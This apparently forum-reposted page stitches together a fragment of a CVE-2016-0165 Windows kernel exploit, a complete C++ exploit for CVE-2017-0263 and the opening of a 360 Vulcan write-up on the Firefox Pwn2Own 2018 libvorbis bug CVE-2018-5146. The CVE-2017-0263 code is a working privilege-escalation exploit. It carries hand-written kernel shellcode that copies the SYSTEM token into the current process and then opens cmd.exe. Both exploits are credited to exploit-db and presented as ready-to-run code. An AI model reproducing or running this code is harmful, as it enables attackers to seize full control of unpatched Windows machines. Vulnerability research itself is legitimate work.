        std::cout << "FAILED" << std::endl;
    }
}

INT POC_CVE20160165(VOID)
{
    std::cout << "-------------------" << std::endl;
    std::cout << "POC - CVE-2016-0165" << std::endl;
    std::cout << "-------------------" << std::endl;
    BOOL bReturn = FALSE;
    do {
        std::cout << "INIT POINTS..." << std::endl;
        xxInitPoints();
        HDC hdc = GetDC(NULL);
        std::cout << "GET DEVICE CONTEXT: " << hdc << std::endl;
        if (hdc == NULL) {
            bReturn = FALSE;
            break;
        }
        std::cout << "BEGIN DC PATH..." << std::endl;
        bReturn = BeginPath(hdc);
        if (!bReturn) {
            break;
        }
        std::cout << "DRAW POLYLINES..." << std::endl;
        bReturn = xxDrawPolyLines(hdc);
        if (!bReturn) {
            break;
        }
        std::cout << "ENDED DC PATH..." << std::endl;
        bReturn = EndPath(hdc);
        if (!bReturn) {
            break;
        }
        std::cout << "CREATE BITMAPS (1)..." << std::endl;
        bReturn = xxCreateBitmaps(0xE34, 0x01, 8);
        if (!bReturn) {
            break;
        }
        std::cout << "CREATE ACCTABS (1)..." << std::endl;
        bReturn = xxCreateAcceleratorTables();
        if (!bReturn) {
            break;
        }
        std::cout << "DELETE BITMAPS (1)..." << std::endl;
        xxDeleteBitmaps();
        std::cout << "CREATE CLIPBDS (1)..." << std::endl;
        xxCreateClipboards();
        std::cout << "CREATE BITMAPS (2)..." << std::endl;
        bReturn = xxCreateBitmaps(0x01, 0xB1, 32);
        std::cout << "DELETE ACCTABS (H)..." << std::endl;
        xxDigHoleInAcceleratorTables(2000, 4000);
        std::cout << "PATH TO REGION..." << std::endl;
        POCDEBUG_BREAK();
        HRGN hrgn = PathToRegion(hdc);
        if (hrgn == NULL) {
            bReturn = FALSE;
            break;
        }
        std::cout << "DELETE REGION..." << std::endl;
        DeleteObject(hrgn);
        std::cout << "LOCATE HUNTED BITMAP..." << std::endl;
        bReturn = xxRetrieveBitmapBits();
        if (!bReturn) {
            break;
        }
        // std::cout << "OUTPUT BITMAP BITS..." << std::endl;
        // xxOutputBitmapBits();
        std::cout << "MODIFY EXTEND BITMAP HEIGHT..." << std::endl;
        POCDEBUG_BREAK();
        bReturn = xxPoint(iExtHeight, 0xFFFFFFFF);
        if (!bReturn) {
            break;
        }
        std::cout << "LOCATE EXTEND BITMAP..." << std::endl;
        bReturn = xxGetExtendPalette();
        if (!bReturn) {
            break;
        }
        if ((pBmpHunted[iExtpScan0] & 0xFFF) != 0x00000CCC) {
            bReturn = FALSE;
            std::cout << "FAILED: " << (PVOID)pBmpHunted[iExtpScan0] << std::endl;
            break;
        }
        iMemHunted = (pBmpHunted[iExtpScan0] & ~0xFFF) - 0x1000;
        std::cout << "HUNTED PAGE: " << (PVOID)iMemHunted << std::endl;
        std::cout << "FIX HUNTED POOL HEADER..." << std::endl;
        bReturn = xxFixHuntedPoolHeader();
        if (!bReturn) {
            break;
        }
        std::cout << "FIX HUNTED BITMAP OBJECT..." << std::endl;
        bReturn = xxFixHuntedBitmapObject();
        if (!bReturn) {
            break;
        }
        std::cout << "-------------------" << std::endl;
        std::cout << "PRIVILEGE ELEVATION" << std::endl;
        std::cout << "-------------------" << std::endl;
        xxPrivilegeElevation();
        std::cout << "-------------------" << std::endl;
        std::cout << "DELETE BITMAPS (2)..." << std::endl;
        xxDeleteBitmaps();
        std::cout << "DELETE ACCTABS (3)..." << std::endl;
        xxDeleteAcceleratorTables();
        bReturn = TRUE;
    } while (FALSE);
    if (!bReturn) {
        std::cout << GetLastError() << std::endl;
    }
    std::cout << "-------------------" << std::endl;
    getchar();
    return 0;
}

INT main(INT argc, CHAR *argv[])
{
    POC_CVE20160165();
    return 0;
}

Sursa: https://www.exploit-db.com/exploits/44480/?rss&utm_source=dlvr.it&utm_medium=twitter
-
#include <Windows.h>
#include <wingdi.h>
#include <iostream>
#include <Psapi.h>

#pragma comment(lib, "psapi.lib")

#define POCDEBUG 0

#if POCDEBUG == 1
#define POCDEBUG_BREAK() getchar()
#elif POCDEBUG == 2
#define POCDEBUG_BREAK() DebugBreak()
#else
#define POCDEBUG_BREAK()
#endif

static PVOID(__fastcall *pfnHMValidateHandle)(HANDLE, BYTE) = NULL;

static constexpr UINT num_PopupMenuCount = 2;
static constexpr UINT num_WndShadowCount = 3;
static constexpr UINT num_NtUserMNDragLeave = 0x11EC;
static constexpr UINT num_offset_WND_pcls = 0x64;

static HMENU hpopupMenu[num_PopupMenuCount] = { 0 };
static UINT iMenuCreated = 0;
static BOOL bDoneExploit = FALSE;
static DWORD popupMenuRoot = 0;
static HWND hWindowMain = NULL;
static HWND hWindowHunt = NULL;
static HWND hWindowList[0x100] = { 0 };
static UINT iWindowCount = 0;
static PVOID pvHeadFake = NULL;
static PVOID pvAddrFlags = NULL;

typedef struct _HEAD {
    HANDLE h;
    DWORD cLockObj;
} HEAD, *PHEAD;

typedef struct _THROBJHEAD {
    HEAD head;
    PVOID pti;
} THROBJHEAD, *PTHROBJHEAD;

typedef struct _DESKHEAD {
    PVOID rpdesk;
    PBYTE pSelf;
} DESKHEAD, *PDESKHEAD;

typedef struct _THRDESKHEAD {
    THROBJHEAD thread;
    DESKHEAD deskhead;
} THRDESKHEAD, *PTHRDESKHEAD;

typedef struct _SHELLCODE {
    DWORD reserved;
    DWORD pid;
    DWORD off_CLS_lpszMenuName;
    DWORD off_THREADINFO_ppi;
    DWORD off_EPROCESS_ActiveLink;
    DWORD off_EPROCESS_Token;
    PVOID tagCLS[0x100];
    BYTE pfnWindProc[];
} SHELLCODE, *PSHELLCODE;

static PSHELLCODE pvShellCode = NULL;

// Arguments:
//   [ebp+08h]:pwnd = pwndWindowHunt;
//   [ebp+0Ch]:msg = 0x9F9F;
//   [ebp+10h]:wParam = popupMenuRoot;
//   [ebp+14h]:lParam = NULL;
// In kernel-mode, the first argument is tagWND pwnd.
static BYTE xxPayloadWindProc[] = {
    // Loader+0x108a:
    // Judge if the `msg` is 0x9f9f value.
    0x55,                               // push ebp
    0x8b, 0xec,                         // mov ebp,esp
    0x8b, 0x45, 0x0c,                   // mov eax,dword ptr [ebp+0Ch]
    0x3d, 0x9f, 0x9f, 0x00, 0x00,       // cmp eax,9F9Fh
    0x0f, 0x85, 0x8d, 0x00, 0x00, 0x00, // jne Loader+0x1128
    // Loader+0x109b:
    // Judge if CS is 0x1b, which means in user-mode context.
    0x66, 0x8c, 0xc8,                   // mov ax,cs
    0x66, 0x83, 0xf8, 0x1b,             // cmp ax,1Bh
    0x0f, 0x84, 0x80, 0x00, 0x00, 0x00, // je Loader+0x1128
    // Loader+0x10a8:
    // Get the address of pwndWindowHunt to ECX.
    // Recover the flags of pwndWindowHunt: zero bServerSideWindowProc.
    // Get the address of pvShellCode to EDX by CALL-POP.
    // Get the address of pvShellCode->tagCLS[0x100] to ESI.
    // Get the address of popupMenuRoot to EDI.
    0xfc,                               // cld
    0x8b, 0x4d, 0x08,                   // mov ecx,dword ptr [ebp+8]
    0xff, 0x41, 0x16,                   // inc dword ptr [ecx+16h]
    0x60,                               // pushad
    0xe8, 0x00, 0x00, 0x00, 0x00,       // call $5
    0x5a,                               // pop edx
    0x81, 0xea, 0x43, 0x04, 0x00, 0x00, // sub edx,443h
    0xbb, 0x00, 0x01, 0x00, 0x00,       // mov ebx,100h
    0x8d, 0x72, 0x18,                   // lea esi,[edx+18h]
    0x8b, 0x7d, 0x10,                   // mov edi,dword ptr [ebp+10h]
    // Loader+0x10c7:
    0x85, 0xdb,                         // test ebx,ebx
    0x74, 0x13,                         // je Loader+0x10de
    // Loader+0x10cb:
    // Judge if pvShellCode->tagCLS[ebx] == NULL
    0xad,                               // lods dword ptr [esi]
    0x4b,                               // dec ebx
    0x83, 0xf8, 0x00,                   // cmp eax,0
    0x74, 0xf5,                         // je Loader+0x10c7
    // Loader+0x10d2:
    // Judge if tagCLS->lpszMenuName == popupMenuRoot
    0x03, 0x42, 0x08,                   // add eax,dword ptr [edx+8]
    0x39, 0x38,                         // cmp dword ptr [eax],edi
    0x75, 0xee,                         // jne Loader+0x10c7
    // Loader+0x10d9:
    // Zero tagCLS->lpszMenuName
    0x83, 0x20, 0x00,                   // and dword ptr [eax],0
    0xeb, 0xe9,                         // jmp Loader+0x10c7
    // Loader+0x10de:
    // Get the value of pwndWindowHunt->head.pti->ppi->Process to ECX.
    // Get the value of pvShellCode->pid to EAX.
    0x8b, 0x49, 0x08,                   // mov ecx,dword ptr [ecx+8]
    0x8b, 0x5a, 0x0c,                   // mov ebx,dword ptr [edx+0Ch]
    0x8b, 0x0c, 0x0b,                   // mov ecx,dword ptr [ebx+ecx]
    0x8b, 0x09,                         // mov ecx,dword ptr [ecx]
    0x8b, 0x5a, 0x10,                   // mov ebx,dword ptr [edx+10h]
    0x8b, 0x42, 0x04,                   // mov eax,dword ptr [edx+4]
    0x51,                               // push ecx
    // Loader+0x10f0:
    // Judge if EPROCESS->UniqueId == pid.
    0x39, 0x44, 0x0b, 0xfc,             // cmp dword ptr [ebx+ecx-4],eax
    0x74, 0x07,                         // je Loader+0x10fd
    // Loader+0x10f6:
    // Get next EPROCESS to ECX by ActiveLink.
    0x8b, 0x0c, 0x0b,                   // mov ecx,dword ptr [ebx+ecx]
    0x2b, 0xcb,                         // sub ecx,ebx
    0xeb, 0xf3,                         // jmp Loader+0x10f0
    // Loader+0x10fd:
    // Get current EPROCESS to EDI.
    0x8b, 0xf9,                         // mov edi,ecx
    0x59,                               // pop ecx
    // Loader+0x1100:
    // Judge if EPROCESS->UniqueId == 4
    0x83, 0x7c, 0x0b, 0xfc, 0x04,       // cmp dword ptr [ebx+ecx-4],4
    0x74, 0x07,                         // je Loader+0x110e
    // Loader+0x1107:
    // Get next EPROCESS to ECX by ActiveLink.
    0x8b, 0x0c, 0x0b,                   // mov ecx,dword ptr [ebx+ecx]
    0x2b, 0xcb,                         // sub ecx,ebx
    0xeb, 0xf2,                         // jmp Loader+0x1100
    // Loader+0x110e:
    // Get system EPROCESS to ESI.
    // Get the value of system EPROCESS->Token to current EPROCESS->Token.
    // Add 2 to OBJECT_HEADER->PointerCount of system Token.
    // Return 0x9F9F to the caller.
    0x8b, 0xf1,                         // mov esi,ecx
    0x8b, 0x42, 0x14,                   // mov eax,dword ptr [edx+14h]
    0x03, 0xf0,                         // add esi,eax
    0x03, 0xf8,                         // add edi,eax
    0xad,                               // lods dword ptr [esi]
    0xab,                               // stos dword ptr es:[edi]
    0x83, 0xe0, 0xf8,                   // and eax,0FFFFFFF8h
    0x83, 0x40, 0xe8, 0x02,             // add dword ptr [eax-18h],2
    0x61,                               // popad
    0xb8, 0x9f, 0x9f, 0x00, 0x00,       // mov eax,9F9Fh
    0xeb, 0x05,                         // jmp Loader+0x112d
    // Loader+0x1128:
    // Failed in processing.
    0xb8, 0x01, 0x00, 0x00, 0x00,       // mov eax,1
    // Loader+0x112d:
    0xc9,                               // leave
    0xc2, 0x10, 0x00,                   // ret 10h
};

static VOID xxGetHMValidateHandle(VOID)
{
    HMODULE hModule = LoadLibraryA("USER32.DLL");
    PBYTE pfnIsMenu = (PBYTE)GetProcAddress(hModule, "IsMenu");
    PBYTE Address = NULL;
    for (INT i = 0; i < 0x30; i++) {
        if (*(WORD *)(i + pfnIsMenu) != 0x02B2) {
            continue;
        }
        i += 2;
        if (*(BYTE *)(i + pfnIsMenu) != 0xE8) {
            continue;
        }
        Address = *(DWORD *)(i + pfnIsMenu + 1) + pfnIsMenu;
        Address = Address + i + 5;
        pfnHMValidateHandle = (PVOID(__fastcall *)(HANDLE, BYTE))Address;
        break;
    }
}

#define TYPE_WINDOW 1

static PVOID xxHMValidateHandleEx(HWND hwnd)
{
    return pfnHMValidateHandle((HANDLE)hwnd, TYPE_WINDOW);
}

static PVOID xxHMValidateHandle(HWND hwnd)
{
    PVOID RetAddr = NULL;
    if (!pfnHMValidateHandle) {
        xxGetHMValidateHandle();
    }
    if (pfnHMValidateHandle) {
        RetAddr = xxHMValidateHandleEx(hwnd);
    }
    return RetAddr;
}

static ULONG_PTR xxSyscall(UINT num, ULONG_PTR param1, ULONG_PTR param2)
{
    __asm { mov eax, num };
    __asm { int 2eh };
}

static LRESULT WINAPI xxShadowWindowProc(
    _In_ HWND hwnd,
    _In_ UINT msg,
    _In_ WPARAM wParam,
    _In_ LPARAM lParam
)
{
    if (msg != WM_NCDESTROY || bDoneExploit) {
        return DefWindowProcW(hwnd, msg, wParam, lParam);
    }
    std::cout << "::" << __FUNCTION__ << std::endl;
    POCDEBUG_BREAK();
    DWORD dwPopupFake[0xD] = { 0 };
    dwPopupFake[0x0] = (DWORD)0x00098208;      //->flags
    dwPopupFake[0x1] = (DWORD)pvHeadFake;      //->spwndNotify
    dwPopupFake[0x2] = (DWORD)pvHeadFake;      //->spwndPopupMenu
    dwPopupFake[0x3] = (DWORD)pvHeadFake;      //->spwndNextPopup
    dwPopupFake[0x4] = (DWORD)pvAddrFlags - 4; //->spwndPrevPopup
    dwPopupFake[0x5] = (DWORD)pvHeadFake;      //->spmenu
    dwPopupFake[0x6] = (DWORD)pvHeadFake;      //->spmenuAlternate
    dwPopupFake[0x7] = (DWORD)pvHeadFake;      //->spwndActivePopup
    dwPopupFake[0x8] = (DWORD)0xFFFFFFFF;      //->ppopupmenuRoot
    dwPopupFake[0x9] = (DWORD)pvHeadFake;      //->ppmDelayedFree
    dwPopupFake[0xA] = (DWORD)0xFFFFFFFF;      //->posSelectedItem
    dwPopupFake[0xB] = (DWORD)pvHeadFake;      //->posDropped
    dwPopupFake[0xC] = (DWORD)0;
    for (UINT i = 0; i < iWindowCount; ++i) {
        SetClassLongW(hWindowList[i], GCL_MENUNAME, (LONG)dwPopupFake);
    }
    xxSyscall(num_NtUserMNDragLeave, 0, 0);
    LRESULT Triggered = SendMessageW(hWindowHunt, 0x9F9F, popupMenuRoot, 0);
    bDoneExploit = Triggered == 0x9F9F;
    return DefWindowProcW(hwnd, msg, wParam, lParam);
}

#define MENUCLASS_NAME L"#32768"

static LRESULT CALLBACK xxWindowHookProc(INT code, WPARAM wParam, LPARAM lParam)
{
    tagCWPSTRUCT *cwp = (tagCWPSTRUCT *)lParam;
    static HWND hwndMenuHit = 0;
    static UINT iShadowCount = 0;
    if (bDoneExploit || iMenuCreated != num_PopupMenuCount - 2 || cwp->message != WM_NCCREATE) {
        return CallNextHookEx(0, code, wParam, lParam);
    }
    std::cout << "::" << __FUNCTION__ << std::endl;
    WCHAR szTemp[0x20] = { 0 };
    GetClassNameW(cwp->hwnd, szTemp, 0x14);
    if (!wcscmp(szTemp, L"SysShadow") && hwndMenuHit != NULL) {
        std::cout << "::iShadowCount=" << iShadowCount << std::endl;
        POCDEBUG_BREAK();
        if (++iShadowCount == num_WndShadowCount) {
            SetWindowLongW(cwp->hwnd, GWL_WNDPROC, (LONG)xxShadowWindowProc);
        } else {
            SetWindowPos(hwndMenuHit, NULL, 0, 0, 0, 0, SWP_NOSIZE | SWP_NOMOVE | SWP_NOZORDER | SWP_HIDEWINDOW);
            SetWindowPos(hwndMenuHit, NULL, 0, 0, 0, 0, SWP_NOSIZE | SWP_NOMOVE | SWP_NOZORDER | SWP_SHOWWINDOW);
        }
    } else if (!wcscmp(szTemp, MENUCLASS_NAME)) {
        hwndMenuHit = cwp->hwnd;
        std::cout << "::hwndMenuHit=" << hwndMenuHit << std::endl;
    }
    return CallNextHookEx(0, code, wParam, lParam);
}

#define MN_ENDMENU 0x1F3

static VOID CALLBACK xxWindowEventProc(
    HWINEVENTHOOK hWinEventHook,
    DWORD event,
    HWND hwnd,
    LONG idObject,
    LONG idChild,
    DWORD idEventThread,
    DWORD dwmsEventTime
)
{
    UNREFERENCED_PARAMETER(hWinEventHook);
    UNREFERENCED_PARAMETER(event);
    UNREFERENCED_PARAMETER(idObject);
    UNREFERENCED_PARAMETER(idChild);
    UNREFERENCED_PARAMETER(idEventThread);
    UNREFERENCED_PARAMETER(dwmsEventTime);
    std::cout << "::" << __FUNCTION__ << std::endl;
    if (iMenuCreated == 0) {
        popupMenuRoot = *(DWORD *)((PBYTE)xxHMValidateHandle(hwnd) + 0xb0);
    }
    if (++iMenuCreated >= num_PopupMenuCount) {
        std::cout << ">>SendMessage(MN_ENDMENU)" << std::endl;
        POCDEBUG_BREAK();
        SendMessageW(hwnd, MN_ENDMENU, 0, 0);
    } else {
        std::cout << ">>SendMessage(WM_LBUTTONDOWN)" << std::endl;
        POCDEBUG_BREAK();
        SendMessageW(hwnd, WM_LBUTTONDOWN, 1, 0x00020002);
    }
}

static BOOL xxRegisterWindowClassW(LPCWSTR lpszClassName, INT cbWndExtra)
{
    WNDCLASSEXW wndClass = { 0 };
    wndClass = { 0 };
    wndClass.cbSize = sizeof(WNDCLASSEXW);
    wndClass.lpfnWndProc = DefWindowProcW;
    wndClass.cbWndExtra = cbWndExtra;
    wndClass.hInstance = GetModuleHandleA(NULL);
    wndClass.lpszMenuName = NULL;
    wndClass.lpszClassName = lpszClassName;
    return RegisterClassExW(&wndClass);
}

static HWND xxCreateWindowExW(LPCWSTR lpszClassName, DWORD dwExStyle, DWORD dwStyle)
{
    return CreateWindowExW(dwExStyle, lpszClassName, NULL, dwStyle, 0, 0, 1, 1, NULL, NULL, GetModuleHandleA(NULL), NULL);
}

static VOID xxCreateCmdLineProcess(VOID)
{
    STARTUPINFO si = { sizeof(si) };
    PROCESS_INFORMATION pi = { 0 };
    si.dwFlags = STARTF_USESHOWWINDOW;
    si.wShowWindow = SW_SHOW;
    WCHAR wzFilePath[MAX_PATH] = { L"cmd.exe" };
    BOOL bReturn = CreateProcessW(NULL, wzFilePath, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi);
    if (bReturn) CloseHandle(pi.hThread), CloseHandle(pi.hProcess);
}

static DWORD WINAPI xxTrackExploitEx(LPVOID lpThreadParameter)
{
    UNREFERENCED_PARAMETER(lpThreadParameter);
    std::cout << "::" << __FUNCTION__ << std::endl;
    POCDEBUG_BREAK();
    for (INT i = 0; i < num_PopupMenuCount; i++) {
        MENUINFO mi = { 0 };
        hpopupMenu[i] = CreatePopupMenu();
        mi.cbSize = sizeof(mi);
        mi.fMask = MIM_STYLE;
        mi.dwStyle = MNS_AUTODISMISS | MNS_MODELESS | MNS_DRAGDROP;
        SetMenuInfo(hpopupMenu[i], &mi);
    }
    for (INT i = 0; i < num_PopupMenuCount; i++) {
        LPCSTR szMenuItem = "item";
        AppendMenuA(hpopupMenu[i], MF_BYPOSITION | MF_POPUP, (i >= num_PopupMenuCount - 1) ? 0 : (UINT_PTR)hpopupMenu[i + 1], szMenuItem);
    }
    for (INT i = 0; i < 0x100; i++) {
        WNDCLASSEXW Class = { 0 };
        WCHAR szTemp[20] = { 0 };
        HWND hwnd = NULL;
        wsprintfW(szTemp, L"%x-%d", rand(), i);
        Class.cbSize = sizeof(WNDCLASSEXA);
        Class.lpfnWndProc = DefWindowProcW;
        Class.cbWndExtra = 0;
        Class.hInstance = GetModuleHandleA(NULL);
        Class.lpszMenuName = NULL;
        Class.lpszClassName = szTemp;
        if (!RegisterClassExW(&Class)) {
            continue;
        }
        hwnd = CreateWindowExW(0, szTemp, NULL, WS_OVERLAPPED, 0, 0, 0, 0, NULL, NULL, GetModuleHandleA(NULL), NULL);
        if (hwnd == NULL) {
            continue;
        }
        hWindowList[iWindowCount++] = hwnd;
    }
    for (INT i = 0; i < iWindowCount; i++) {
        pvShellCode->tagCLS[i] = *(PVOID *)((PBYTE)xxHMValidateHandle(hWindowList[i]) + num_offset_WND_pcls);
    }
    DWORD fOldProtect = 0;
    VirtualProtect(pvShellCode, 0x1000, PAGE_EXECUTE_READ, &fOldProtect);
    xxRegisterWindowClassW(L"WNDCLASSMAIN", 0x000);
    hWindowMain = xxCreateWindowExW(L"WNDCLASSMAIN", WS_EX_LAYERED | WS_EX_TOOLWINDOW | WS_EX_TOPMOST, WS_VISIBLE);
    xxRegisterWindowClassW(L"WNDCLASSHUNT", 0x200);
    hWindowHunt = xxCreateWindowExW(L"WNDCLASSHUNT", WS_EX_LEFT, WS_OVERLAPPED);
    PTHRDESKHEAD head = (PTHRDESKHEAD)xxHMValidateHandle(hWindowHunt);
    PBYTE pbExtra = head->deskhead.pSelf + 0xb0 + 4;
    pvHeadFake = pbExtra + 0x44;
    for (UINT x = 0; x < 0x7F; x++) {
        SetWindowLongW(hWindowHunt, sizeof(DWORD) * (x + 1), (LONG)pbExtra);
    }
    PVOID pti = head->thread.pti;
    SetWindowLongW(hWindowHunt, 0x28, 0);
    SetWindowLongW(hWindowHunt, 0x50, (LONG)pti); // pti
    SetWindowLongW(hWindowHunt, 0x6C, 0);
    SetWindowLongW(hWindowHunt, 0x1F8, 0xC033C033);
    SetWindowLongW(hWindowHunt, 0x1FC, 0xFFFFFFFF);
    pvAddrFlags = *(PBYTE *)((PBYTE)xxHMValidateHandle(hWindowHunt) + 0x10) + 0x16;
    SetWindowLongW(hWindowHunt, GWL_WNDPROC, (LONG)pvShellCode->pfnWindProc);
    SetWindowsHookExW(WH_CALLWNDPROC, xxWindowHookProc, GetModuleHandleA(NULL), GetCurrentThreadId());
    SetWinEventHook(EVENT_SYSTEM_MENUPOPUPSTART, EVENT_SYSTEM_MENUPOPUPSTART, GetModuleHandleA(NULL), xxWindowEventProc, GetCurrentProcessId(), GetCurrentThreadId(), 0);
    TrackPopupMenuEx(hpopupMenu[0], 0, 0, 0, hWindowMain, NULL);
    MSG msg = { 0 };
    while (GetMessageW(&msg, NULL, 0, 0)) {
        TranslateMessage(&msg);
        DispatchMessageW(&msg);
    }
    return 0;
}

INT POC_CVE20170263(VOID)
{
    std::cout << "-------------------" << std::endl;
    std::cout << "POC - CVE-2017-0263" << std::endl;
    std::cout << "-------------------" << std::endl;
    pvShellCode = (PSHELLCODE)VirtualAlloc(NULL, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (pvShellCode == NULL) {
        return 0;
    }
    ZeroMemory(pvShellCode, 0x1000);
    pvShellCode->pid = GetCurrentProcessId();
    pvShellCode->off_CLS_lpszMenuName = 0x050;
    pvShellCode->off_THREADINFO_ppi = 0x0b8;
    pvShellCode->off_EPROCESS_ActiveLink = 0x0b8;
    pvShellCode->off_EPROCESS_Token = 0x0f8;
    CopyMemory(pvShellCode->pfnWindProc, xxPayloadWindProc, sizeof(xxPayloadWindProc));
    std::cout << "CREATE WORKER THREAD..." << std::endl;
    POCDEBUG_BREAK();
    HANDLE hThread = CreateThread(NULL, 0, xxTrackExploitEx, NULL, 0, NULL);
    if (hThread == NULL) {
        return FALSE;
    }
    while (!bDoneExploit) {
        Sleep(500);
    }
    xxCreateCmdLineProcess();
    DestroyWindow(hWindowMain);
    TerminateThread(hThread, 0);
    std::cout << "-------------------" << std::endl;
    getchar();
    return bDoneExploit;
}

INT main(INT argc, CHAR *argv[])
{
    POC_CVE20170263();
    return 0;
}

Sursa: https://www.exploit-db.com/exploits/44478/?rss&utm_source=dlvr.it&utm_medium=twitter
-
How to kill a (Fire)fox – en
16 Apr 2018, by admin001
Pwn2own 2018 Firefox case study
Author: Hanming Zhang from 360 Vulcan Team

1. Debug Environment
OS: Windows 10
Firefox_Setup_59.0.exe SHA1: 294460F0287BCF5601193DCA0A90DB8FE740487C
Xul.dll SHA1: E93D1E5AF21EB90DC8804F0503483F39D5B184A9

2. Patch Information
The issue in Mozilla's Bugzilla is Bug 1446062. The vulnerability used in Pwn2Own 2018 is assigned CVE-2018-5146. From the Mozilla security advisory, we can see this vulnerability came from libvorbis – a third-party media library. In the next section, I will introduce some basic information about this library.

3. Ogg and Vorbis
3.1. Ogg
Ogg is a free, open container format maintained by the Xiph.Org Foundation. An Ogg file consists of a number of Ogg pages, and each Ogg page contains one Ogg header and one segment table. The structure of an Ogg page is illustrated in the following picture.
Pic.1 Ogg Page Structure
3.2. Vorbis
Vorbis is a free and open-source software project headed by the Xiph.Org Foundation. In an Ogg file, data related to Vorbis is encapsulated into the segment table inside an Ogg page. One MIT document shows the process of encapsulation.
3.2.1. Vorbis Header
In Vorbis there are three kinds of Vorbis headers, and for one Vorbis bitstream all three kinds must be present:
Vorbis Identification Header
Basically identifies the Ogg bitstream as being in Vorbis format. It contains information such as the Vorbis version and basic audio properties of the bitstream, including the number of channels and the bitrate.
Vorbis Comment Header
Basically contains user-defined comments, such as vendor information.
Vorbis Setup Header
Basically contains information used to set up the codec, such as the complete VQ and Huffman codebooks used in decoding.
3.2.2. Vorbis Identification Header
The Vorbis Identification Header structure can be illustrated as follows:
Pic.2 Vorbis Identification Header Structure
3.2.3.
Vorbis Setup Header
The Vorbis Setup Header structure is more complicated than the other headers; it contains several substructures, such as codebooks. After "vorbis" comes the number of codebooks, followed by that many CodeBook objects, and next come the TimeBackends, FloorBackends, ResidueBackends, MapBackends and Modes. The Vorbis Setup Header structure can be roughly illustrated as follows:
Pic.3 Vorbis Setup Header Structure
3.2.3.1. Vorbis CodeBook
As in the Vorbis spec, a CodeBook structure can be represented as follows:

byte 0: [ 0 1 0 0 0 0 1 0 ] (0x42)
byte 1: [ 0 1 0 0 0 0 1 1 ] (0x43)
byte 2: [ 0 1 0 1 0 1 1 0 ] (0x56)
byte 3: [ X X X X X X X X ]
byte 4: [ X X X X X X X X ] [codebook_dimensions] (16 bit unsigned)
byte 5: [ X X X X X X X X ]
byte 6: [ X X X X X X X X ]
byte 7: [ X X X X X X X X ] [codebook_entries] (24 bit unsigned)
byte 8: [ X ] [ordered] (1 bit)
byte 8: [ X 1 ] [sparse] flag (1 bit)

After the header there is a length_table array whose length equals codebook_entries. Each element of this array can be 5 or 6 bits long, depending on the flags. Following are the VQ-related fields:

[codebook_lookup_type] 4 bits
[codebook_minimum_value] 32 bits
[codebook_delta_value] 32 bits
[codebook_value_bits] 4 bits and plus one
[codebook_sequence_p] 1 bits

Finally there is a VQ-table array with length equal to codebook_dimensions * codebook_entries, with each element's length corresponding to codebook_value_bits. codebook_minimum_value and codebook_delta_value are represented as floats, but to support different platforms the Vorbis spec defines an internal representation format for "float" and then uses system math functions to bake it into the system float type. In Windows, it is turned into a double first and then into a float. All of the above builds up a CodeBook structure.
3.2.3.2. Vorbis Time
In the current Vorbis spec, this data structure is nothing but a placeholder; all of its data should be zero.
3.2.3.3.
Vorbis Floor
In the recent Vorbis spec there are two different FloorBackend structures, but they do nothing relevant to the vulnerability, so we just skip this data structure.
3.2.3.4. Vorbis Residue
In the recent Vorbis spec there are three kinds of ResidueBackend, and the different structures call different decode functions in the decode process. The structure can be presented as follows:

[residue_begin] 24 bits
[residue_end] 24 bits
[residue_partition_size] 24 bits and plus one
[residue_classifications] 6 bits and plus one
[residue_classbook] 8 bits

The residue_classbook defines which CodeBook will be used when decoding this ResidueBackend. MapBackend and Mode do not influence the exploit, so we skip them too.

4. Patch analysis
4.1. Patched Function
From the ZDI blog, we can see the vulnerability is inside the following function:

/* decode vector / dim granularity gaurding is done in the upper layer */
long vorbis_book_decodev_add(codebook *book, float *a, oggpack_buffer *b, int n) {
  if (book->used_entries > 0) {
    int i, j, entry;
    float *t;
    if (book->dim > 8) {
      for (i = 0; i < n;) {
        entry = decode_packed_entry_number(book, b);
        if (entry == -1) return (-1);
        t = book->valuelist + entry * book->dim;
        for (j = 0; j < book->dim;) {
          a[i++] += t[j++];
        }
      }
    } else {
      // blablabla
    }
  }
  return (0);
}

Inside the first if branch there is a nested loop. The inner loop uses the unchecked variable book->dim as its bound, but it also advances the variable i that comes from the outer loop. So if book->dim > n, "a[i++] += t[j++]" leads to an out-of-bounds write. In this function, "a" is one of the arguments, and t is calculated from "book->valuelist".
4.2.
Buffer – a
After reading some source code, I found "a" is initialized in the code below:

/* alloc pcm passback storage */
vb->pcmend = ci->blocksizes[vb->W];
vb->pcm = _vorbis_block_alloc(vb, sizeof(*vb->pcm) * vi->channels);
for (i = 0; i < vi->channels; i++)
  vb->pcm[i] = _vorbis_block_alloc(vb, vb->pcmend * sizeof(*vb->pcm[i]));

"vb->pcm[i]" is passed into the vulnerable function as "a", and its memory chunk is allocated by _vorbis_block_alloc with a size equal to vb->pcmend * sizeof(*vb->pcm[i]). And vb->pcmend comes from ci->blocksizes[vb->W]; ci->blocksizes is defined in the Vorbis Identification Header. So we can control the size of the memory chunk allocated for "a". Digging deeper into _vorbis_block_alloc, we find the call chain _vorbis_block_alloc -> _ogg_malloc -> CountingMalloc::Malloc -> arena_t::Malloc, so the memory chunk of "a" lies on the mozJemalloc heap.
4.3. Buffer – t
After reading some source code, I found book->valuelist gets its value here:

c->valuelist = _book_unquantize(s, n, sortindex);

And the logic of _book_unquantize can be shown as follows:

float *_book_unquantize(const static_codebook *b, int n, int *sparsemap) {
  long j, k, count = 0;
  if (b->maptype == 1 || b->maptype == 2) {
    int quantvals;
    float mindel = _float32_unpack(b->q_min);
    float delta = _float32_unpack(b->q_delta);
    float *r = _ogg_calloc(n * b->dim, sizeof(*r));
    switch (b->maptype) {
    case 1:
      quantvals = _book_maptype1_quantvals(b);
      // do some math work
      break;
    case 2:
      float val = b->quantlist[j * b->dim + k];
      // do some math work
      break;
    }
    return (r);
  }
  return (NULL);
}

So book->valuelist is the data decoded from the corresponding CodeBook's VQ data. It lies on the mozJemalloc heap too.
4.4. Cola Time
So now we can see what we have when the vulnerability is triggered:
a: lies on the mozJemalloc heap; its size is controllable.
t: lies on the mozJemalloc heap too; its content is controllable.
book->dim: its content is controllable.
Combining all of the above, we can perform a write operation in the mozJemalloc heap with a controllable offset and content. But what about the controllable size?
Can this work for our exploit? Let's see how mozJemalloc works.

5. mozJemalloc
mozJemalloc is the heap manager Mozilla developed based on jemalloc. The following global variables can show you some information about mozJemalloc:
gArenas
mDefaultArena
mArenas
mPrivateArenas
gChunkBySize
gChunkByAddress
